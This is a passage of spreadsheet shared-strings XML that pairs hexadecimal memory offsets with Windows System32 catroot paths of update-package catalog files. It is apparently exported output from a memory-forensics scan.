  </si>
  <si>
    <t>0xdf667aa0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_27_for_KB2763523~31bf</t>
  </si>
  <si>
    <t>0xdf667be0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_28_for_KB2574819~31bf</t>
  </si>
  <si>
    <t>0xdf667f18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_279_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf668028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_28_for_KB2750841~31bf</t>
  </si>
  <si>
    <t>0xdf6683a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_293_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6684e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_296_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf668820</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_292_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6689f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_290_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf668d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_28_for_KB3133977~31bf</t>
  </si>
  <si>
    <t>0xdf669028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_294_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf669368</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_299_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf669680</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_298_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf669998</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_297_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf669d78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_295_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf669eb8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_29_for_KB3031432~31bf</t>
  </si>
  <si>
    <t>0xdf66a028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_29_for_KB2908783~31bf</t>
  </si>
  <si>
    <t>0xdf66a2a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2425227~31bf3</t>
  </si>
  <si>
    <t>0K_x001B_[140G</t>
  </si>
  <si>
    <t>0xdf66a410</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2534366~31bf3</t>
  </si>
  <si>
    <t>0xdf66a5e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2509553~31bf3</t>
  </si>
  <si>
    <t>0xdf66a9c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2385678~31bf3</t>
  </si>
  <si>
    <t>0xdf66ace0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_29_for_KB3133977~31bf</t>
  </si>
  <si>
    <t>0xdf66ae50</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2506212~31bf3</t>
  </si>
  <si>
    <t>0xdf66b320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2552343~31bf3</t>
  </si>
  <si>
    <t>0xdf66b638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2545698~31bf3</t>
  </si>
  <si>
    <t>0xdf66b950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2533623~31bf3</t>
  </si>
  <si>
    <t>0xdf66ba90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2564958~31bf3</t>
  </si>
  <si>
    <t>0xdf66bc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2533552~31bf3</t>
  </si>
  <si>
    <t>0xdf66bf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2510531~31bf3</t>
  </si>
  <si>
    <t>0xdf66c148</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2653956~31bf3</t>
  </si>
  <si>
    <t>0xdf66c320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2621440~31bf3</t>
  </si>
  <si>
    <t>0xdf66c638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2604115~31bf3</t>
  </si>
  <si>
    <t>0xdf66c950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2585542~31bf3</t>
  </si>
  <si>
    <t>0xdf66ca90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2631813~31bf3</t>
  </si>
  <si>
    <t>0xdf66cc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2579686~31bf3</t>
  </si>
  <si>
    <t>0xdf66cf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2563227~31bf3</t>
  </si>
  <si>
    <t>0xdf66d300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2656356~31bf3</t>
  </si>
  <si>
    <t>0xdf66d440</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2703157~31bf3</t>
  </si>
  <si>
    <t>0xdf66d778</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2654428~31bf3</t>
  </si>
  <si>
    <t>0xdf66d950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2647753~31bf3</t>
  </si>
  <si>
    <t>0xdf66dc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2640148~31bf3</t>
  </si>
  <si>
    <t>0xdf66df80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2639308~31bf3</t>
  </si>
  <si>
    <t>0xdf66e278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2729452~31bf3</t>
  </si>
  <si>
    <t>0xdf66e590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2729094~31bf3</t>
  </si>
  <si>
    <t>0xdf66e6d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2750841~31bf3</t>
  </si>
  <si>
    <t>0xdf66e8a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2705219~31bf3</t>
  </si>
  <si>
    <t>0xdf66ec68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2690533~31bf3</t>
  </si>
  <si>
    <t>0xdf66ef80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2685939~31bf3</t>
  </si>
  <si>
    <t>0xdf66f228</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2862152~31bf3</t>
  </si>
  <si>
    <t>0xdf66f430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2864202~31bf3</t>
  </si>
  <si>
    <t>0xdf66f608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2834140~31bf3</t>
  </si>
  <si>
    <t>0xdf66f920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2820331~31bf3</t>
  </si>
  <si>
    <t>0xdf66fc38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2807986~31bf3</t>
  </si>
  <si>
    <t>0xdf66fd78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2853952~31bf3</t>
  </si>
  <si>
    <t>0xdf66fee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2799926~31bf3</t>
  </si>
  <si>
    <t>0xdf670288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2892074~31bf3</t>
  </si>
  <si>
    <t>0xdf6705a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2888049~31bf3</t>
  </si>
  <si>
    <t>0xdf6706e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2894844~31bf3</t>
  </si>
  <si>
    <t>0xdf670950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2882822~31bf3</t>
  </si>
  <si>
    <t>0xdf670b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2862335~31bf3</t>
  </si>
  <si>
    <t>0xdf670e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2862330~31bf3</t>
  </si>
  <si>
    <t>0xdf671248</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2968294~31bf3</t>
  </si>
  <si>
    <t>0xdf671560</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2943357~31bf3</t>
  </si>
  <si>
    <t>0xdf6716a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2970228~31bf3</t>
  </si>
  <si>
    <t>0xdf671878</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2937610~31bf3</t>
  </si>
  <si>
    <t>0xdf671b90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2931356~31bf3</t>
  </si>
  <si>
    <t>0xdf671ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2893294~31bf3</t>
  </si>
  <si>
    <t>0xdf672288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3020370~31bf3</t>
  </si>
  <si>
    <t>0xdf6723c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3022777~31bf3</t>
  </si>
  <si>
    <t>0xdf6725a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3004361~31bf3</t>
  </si>
  <si>
    <t>0xdf6728b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2977292~31bf3</t>
  </si>
  <si>
    <t>0xdf672bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2973201~31bf3</t>
  </si>
  <si>
    <t>0xdf672d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2998812~31bf3</t>
  </si>
  <si>
    <t>86~~6.1.1.4</t>
  </si>
  <si>
    <t>0xdf672ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB2973112~31bf3</t>
  </si>
  <si>
    <t>0xdf673248</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3035126~31bf3</t>
  </si>
  <si>
    <t>0xdf673560</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3030377~31bf3</t>
  </si>
  <si>
    <t>0xdf6736a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3035132~31bf3</t>
  </si>
  <si>
    <t>0xdf673878</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3023215~31bf3</t>
  </si>
  <si>
    <t>0xdf673c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3021917~31bf3</t>
  </si>
  <si>
    <t>0xdf673ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3020388~31bf3</t>
  </si>
  <si>
    <t>0xdf6741c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3055642~31bf3</t>
  </si>
  <si>
    <t>0xdf6743c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3075220~31bf3</t>
  </si>
  <si>
    <t>0xdf6745a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3046480~31bf3</t>
  </si>
  <si>
    <t>0xdf6748b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3046017~31bf3</t>
  </si>
  <si>
    <t>0xdf674bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3045685~31bf3</t>
  </si>
  <si>
    <t>0xdf674d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3054476~31bf3</t>
  </si>
  <si>
    <t>0xdf674ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3037574~31bf3</t>
  </si>
  <si>
    <t>0xdf6751c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3078601~31bf3</t>
  </si>
  <si>
    <t>0xdf6754d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3076895~31bf3</t>
  </si>
  <si>
    <t>0xdf675618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3092601~31bf3</t>
  </si>
  <si>
    <t>0xdf675950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3075226~31bf3</t>
  </si>
  <si>
    <t>0xdf675b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3074543~31bf3</t>
  </si>
  <si>
    <t>0xdf675e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3059317~31bf3</t>
  </si>
  <si>
    <t>0xdf6761e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3108381~31bf3</t>
  </si>
  <si>
    <t>0xdf676320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3122648~31bf3</t>
  </si>
  <si>
    <t>0xdf6764f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3101722~31bf3</t>
  </si>
  <si>
    <t>0xdf676638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3108664~31bf3</t>
  </si>
  <si>
    <t>0xdf676810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3097989~31bf3</t>
  </si>
  <si>
    <t>0xdf676b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3092627~31bf3</t>
  </si>
  <si>
    <t>0xdf676ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3078667~31bf3</t>
  </si>
  <si>
    <t>0xdf6771c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3133977~31bf3</t>
  </si>
  <si>
    <t>0xdf677300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3140245~31bf3</t>
  </si>
  <si>
    <t>0xdf6774d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3127220~31bf3</t>
  </si>
  <si>
    <t>0xdf677810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3115858~31bf3</t>
  </si>
  <si>
    <t>0xdf677b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3110329~31bf3</t>
  </si>
  <si>
    <t>0xdf677e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3109560~31bf3</t>
  </si>
  <si>
    <t>0xdf6781e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3161102~31bf3</t>
  </si>
  <si>
    <t>0xdf6784f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3156019~31bf3</t>
  </si>
  <si>
    <t>0xdf678638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3161949~31bf3</t>
  </si>
  <si>
    <t>0xdf678810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3156016~31bf3</t>
  </si>
  <si>
    <t>0xdf678bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3139398~31bf3</t>
  </si>
  <si>
    <t>0xdf678ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3137061~31bf3</t>
  </si>
  <si>
    <t>0xdf679118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB4483458~31bf3</t>
  </si>
  <si>
    <t>0xdf679320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_301_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf6794f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB4040980~31bf3</t>
  </si>
  <si>
    <t>0xdf679810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3177467~31bf3</t>
  </si>
  <si>
    <t>86~~6.1.2.5</t>
  </si>
  <si>
    <t>0xdf679b28</t>
  </si>
  <si>
    <t>0xdf679c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB4054518~31bf3</t>
  </si>
  <si>
    <t>0xdf679e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB3170735~31bf3</t>
  </si>
  <si>
    <t>0xdf67a1c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_30_for_KB2908783~31bf</t>
  </si>
  <si>
    <t>0xdf67a4d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_30_for_KB2871997~31bf</t>
  </si>
  <si>
    <t>0xdf67a618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_30_for_KB2984972~31bf</t>
  </si>
  <si>
    <t>0xdf67a950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_30_for_KB2574819~31bf</t>
  </si>
  <si>
    <t>0xdf67ab28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_300_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf67ae40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2_for_KB978601~31bf38</t>
  </si>
  <si>
    <t>6~~6.1.1.1.</t>
  </si>
  <si>
    <t>0xdf67b118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_30_for_KB3031432~31bf</t>
  </si>
  <si>
    <t>0xdf67b430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_30_for_KB3011780~31bf</t>
  </si>
  <si>
    <t>0xdf67b570</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_31_for_KB2984972~31bf</t>
  </si>
  <si>
    <t>0xdf67b748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_30_for_KB3003743~31bf</t>
  </si>
  <si>
    <t>0xdf67ba60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_30_for_KB2992611~31bf</t>
  </si>
  <si>
    <t>0xdf67be40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_30_for_KB2973351~31bf</t>
  </si>
  <si>
    <t>0xdf67bf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_30_for_KB3061518~31bf</t>
  </si>
  <si>
    <t>0xdf67c190</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_31_for_KB3003743~31bf</t>
  </si>
  <si>
    <t>0xdf67c2d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_31_for_KB3061518~31bf</t>
  </si>
  <si>
    <t>0xdf67c4a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_31_for_KB2992611~31bf</t>
  </si>
  <si>
    <t>0xdf67c7e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_31_for_KB2871997~31bf</t>
  </si>
  <si>
    <t>0xdf67caf8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_30_for_KB3124275~31bf</t>
  </si>
  <si>
    <t>0xdf67ce10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_30_for_KB3080079~31bf</t>
  </si>
  <si>
    <t>0xdf67d118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_323_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf67d430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_31_for_KB3124275~31bf</t>
  </si>
  <si>
    <t>0xdf67d748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_31_for_KB3080079~31bf</t>
  </si>
  <si>
    <t>0xdf67d950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_324_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf67db28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_31_for_KB3031432~31bf</t>
  </si>
  <si>
    <t>0xdf67de40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_31_for_KB3011780~31bf</t>
  </si>
  <si>
    <t>0xdf67e298</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_32_for_KB3042058~31bf</t>
  </si>
  <si>
    <t>0xdf67e470</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_32_for_KB2984972~31bf</t>
  </si>
  <si>
    <t>0xdf67e788</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_32_for_KB2973351~31bf</t>
  </si>
  <si>
    <t>0xdf67eaa0</t>
  </si>
  <si>
